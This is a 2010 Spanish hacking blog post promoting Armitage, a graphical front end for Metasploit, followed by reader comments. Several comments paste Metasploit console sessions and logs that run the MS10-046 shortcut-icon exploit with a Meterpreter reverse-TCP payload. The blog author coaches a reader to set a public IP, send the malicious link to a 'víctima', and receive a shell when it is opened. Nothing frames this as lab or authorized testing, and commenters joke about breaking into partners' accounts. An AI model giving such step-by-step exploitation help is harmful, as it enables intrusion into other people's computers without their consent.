29 nov 2010

[Armitage] Administrador Gráfico de Cyber Ataques para Metasploit

Armitage es un Administrador Gráfico de Cyber Ataques para Metasploit que sirve para visualizar gráficamente tus objetivos, el mismo programa te recomienda que exploit usar, expone las opciones avanzadas del framework (esas que comúnmente se nos olvida o no sabemos), desde el mismo Armintage podemos iniciar un análisis con Nmap, e incluso se puede usar el módulo de Brute Force para sacar username/password.


Armitage v11.25.10

El objetivo de Armitage es hacer Metasploit útil para los profesionales de seguridad que saben hacking, pero no el uso de Metasploit a fondo. Si desean aprender las características avanzadas de Metasploit, Armitage será de gran ayuda.

Es una herramienta impresionante y muy intuitiva, considero que la herramienta viene como anillo al dedo para los usuarios de Windows que están más acostumbrados a usar el mouse que el teclado (no como los usuarios de GNU/Linux que es al revés). Lo mejor de todo es que se encuentra para los 2 sistemas operativos.

Aquí les dejo 2 Videos oficiales de esta excelente herramienta, disfrútenlos:

Video Explicativo de Armitage (Está en inglés pero bastante entendible):




Video de Armitage en acción:




Para terminar un enlace a la web oficial donde pueden descargar el Armitage tanto para GNU/Linux como para Windows:

http://www.fastandeasyhacking.com/download

  
Correr Armitage en Windows:


Si tienen problemas nunca está demás leer el Manual oficial de Armitage (Inglés con imágenes).

[+] Eso
[+] Salu2 ;)
[+] PD: Este artículo lo pueden distrubuir como quieran, lo pueden copiar, modificar, sacar cosas, agregarles, pero por favor no olviden de donde sacaron la información. No cuesta nada poner de donde sacamos la información con un simple "Fuente: http://blackploit.blogspot.com/". No quería llegar al punto de poner estos mensajes al final del artículo, pero me he encontrado con muchos site que copian y pegan y se les olvida decir si quiera "Gracias".
[+] Salu2 finales XD
[+] ZioneR
[+] PD2: Disfruten la herramienta.

Author & Editor

Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.

17 Notaciones:

  1. ajjajajajaja... soy windowslero y me encanta usar mouse XDD

    Voy a probarlo ya mismo a ver que tal me corre en windows

    Saludos

    ResponderEliminar
  2. Lol, parece mucho mejor que la msfgui que trae MSF por defecto. Pero aun así parece que cada día les hacemos las cosas más faciles a los script kiddies para jackear a sus novias y robarles las pass del messenller.

    .________.

    ResponderEliminar
  3. @Drag0s

    ajajajajjajajja XD

    Es que prefiero darles las herramientas facilitas que responder todos los emails que me llegan preguntando "como jackear a mi novia y robarle las pass del messenller" XDDD

    En todo caso, los videos pintan la herramienta más simple de lo que es en verdad. Ahora mismo la estoy probando y es bastante amplia.

    [+] Salu2

    ResponderEliminar
  4. La he probado y cuando ejecuto el exe me solicita datos de Host y Port.
    En host viene por defecto lohalhost (127.0.0.1). Que hay que poner en estos datos??
    Luego veo que tambien se puede poner para que sea SSL y el tipo de db...

    La verdad es que no se como lanzarlo.
    Dejo una captura delas opciones del programa:
    http://fotosupload.com/mostrar.php?imagen=FuD164550_armitage.jpg

    Un saludo y

    ResponderEliminar
  5. Viejo... mira esta imagen, te va a ayudar ;)

    http://www.fastandeasyhacking.com/images/msfrpcwindows.png

    ResponderEliminar
  6. Pues no consigo conectar BT4 R2 con Güindows XP SP3, y hacen ping entre ellos y eso.
    Alguna sugerencia¿?
    http://s2.subirimagenes.com/otros/previo/thump_5594430sin-ttulo.jpg

    ResponderEliminar
  7. mejor ésta captura que la de antes se ve muy pequeña, http://img189.imageshack.us/img189/3871/sinttulolfk.jpg

    ResponderEliminar
  8. Viejo, no entiendo tu duda... deberías intentar primero aprender Metasploit ;)

    ResponderEliminar
  9. viejo me pasa lo mismo por lo menos pon la imagene del funcionamiento osea paso a paso asta llegar al metasploit gracia

    ResponderEliminar
  10. ZioneR llevo tiempo documentandome sobre Metasploit, y la parte teorica bien...pero a la hora de lanzar los exploits no se establece ninguna conexion.

    ResponderEliminar
  11. hola chicos soy damary me gustaria que me den una ayudadita en esto pongo a correr .....Armitage.... yego asta esta parte y desde hay no se como añadir el hot osea no se lo siguiente miren

    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    meterpreter> set DisablePayloadHandler 1
    DisablePayloadHandler => 1
    msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVPORT 80
    SRVPORT => 80
    msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 0.0.0.0
    SRVHOST => 0.0.0.0
    msf exploit(ms10_046_shortcut_icon_dllloader) > set URIPATH /
    URIPATH => /
    msf exploit(ms10_046_shortcut_icon_dllloader) > exploit -j
    [*] Exploit running as background job.
    [*]
    [*] Send vulnerable clients to \\123.137.17.8:80\ijMQw\.
    [*] Or, get clients to save and render the icon of http:///.lnk
    [*]
    [*] Using URL: http://0.0.0.0:80/
    [*] Local IP: http://123.137.17.8:80/
    [-] Exploit exception: The supplied resource '/' is already added.
    [*] Server stopped.
    msf exploit(ms10_046_shortcut_icon_dllloader) > (NO SE QUE ASER AQUI )

    ResponderEliminar
  12. bueno linda te alludo creo que deve dar clip en Ctrl R

    ResponderEliminar
  13. pense que en esto era para darle ayuda pero veo k si uno tiene alguna duda del funcionamiento de algo nadie te brinda soporte gracia por nada

    ResponderEliminar
  14. @Anónimo:
    Viejo.. Relax. Acabo de volver ya que había tenido mucho mucho trabajo y que haceres.
    ;)

    ResponderEliminar
  15. @Anónimo:
    Bueno viejo.... aunque no va mucho al tema Armitage XD, si va al de mestasploit XD...

    Bueno, el error que cometes es que en
    "set SRVHOST 0.0.0.0" tienes que poner tu Ip pública.

    Luego de que lanzas el exploit con "exploit -j" te aparecerá la URL máligna ("Using URL: http://tu_ip:80/") que tienes que enviar a tu víctima para que se ejecute el exploit y se conecte a tu PC según el payload que elegiste.

    Después (si tu víctima abrió el link) se abrirá una shell hacia su PC.

    [+] Salu2

    ResponderEliminar
  16. buno gracias pero se un poquito mas rapidito que tu sabe k cuando estamos trabajando con hack tengo una cesacion grande mucha gracias

    ResponderEliminar
  17. Por favor si me pueden ayudar estoy usando como SRVHOST miiplocal(192.168...) - tambien probe con la de afuera que seria la de cara a internet...

    La victima es un Win XP SP 2 Expañol.

    El log se separa en 2 partes , porque genere 2 link's - creo - xD

    (1- 192.168.1.35:1438 /EdKan/ )
    (2 - 192.168.1.35:1438 /TLbLExJoMRv )

    Sin mentirles les admito que lo que yo hago mal desde la virtual quizas es el procedimiento.

    Copio y pego la direccion que me otorga al cargar osea /edkan y o /TLbLExJomRv desde un IE o sino desde el ejecutar y obtengo ese log de abajo.

    Gracias a los que me puedan ayudar.
    msf exploit(ms10_046_shortcut_icon_dllloader) > set SVRHOST 192.168.1.35
    SVRHOST => 192.168.1.35
    msf exploit(ms10_046_shortcut_icon_dllloader) > exploit -j
    [*] Exploit running as background job.
    msf exploit(ms10_046_shortcut_icon_dllloader) >
    [*]
    [*] Send vulnerable clients to \\192.168.1.35\EDkaN\.
    [*] Or, get clients to save and render the icon of http:///.lnk
    [*]
    [*] Using URL: http://0.0.0.0:80/
    [*] Local IP: http://192.168.1.35:80/
    [-] Exploit exception: The supplied resource '/' is already added.
    [*] Server stopped.
    [*] Responding to WebDAV OPTIONS request from 192.168.1.35:1438
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
    [*] Sending 301 for /TLbLExJoMRv ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
    [*] Sending directory multistatus for /TLbLExJoMRv/ ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
    [*] Sending 301 for /TLbLExJoMRv ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
    [*] Sending directory multistatus for /TLbLExJoMRv/ ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
    [*] Sending 301 for /TLbLExJoMRv ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
    [*] Sending directory multistatus for /TLbLExJoMRv/ ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
    [*] Sending 301 for /TLbLExJoMRv ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
    [*] Sending directory multistatus for /TLbLExJoMRv/ ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
    [*] Sending 301 for /TLbLExJoMRv ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
    [*] Sending directory multistatus for /TLbLExJoMRv/ ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
    [*] Sending 301 for /TLbLExJoMRv ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
    [*] Sending directory multistatus for /TLbLExJoMRv/ ...
    [*] Sending UNC redirect to 192.168.1.35:1453 ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv
    [*] Sending 301 for /TLbLExJoMRv ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/
    [*] Sending directory multistatus for /TLbLExJoMRv/ ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/desktop.ini
    [*] Sending 404 for /TLbLExJoMRv/desktop.ini ...
    [*] Sending DLL payload 192.168.1.35:1438 ...
    [*] Sending LNK file to 192.168.1.35:1438 ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/ovKtsdKSmY.dll.manifest
    [*] Sending 404 for /TLbLExJoMRv/ovKtsdKSmY.dll.manifest ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /TLbLExJoMRv/ovKtsdKSmY.dll.123.Manifest
    [*] Sending 404 for /TLbLExJoMRv/ovKtsdKSmY.dll.123.Manifest ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /EdKan
    [*] Sending 301 for /EdKan ...
    [*] Received WebDAV PROPFIND request from 192.168.1.35:1438 /EdKan/
    [*] Sending directory multistatus for /EdKan/ ...

    ResponderEliminar

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.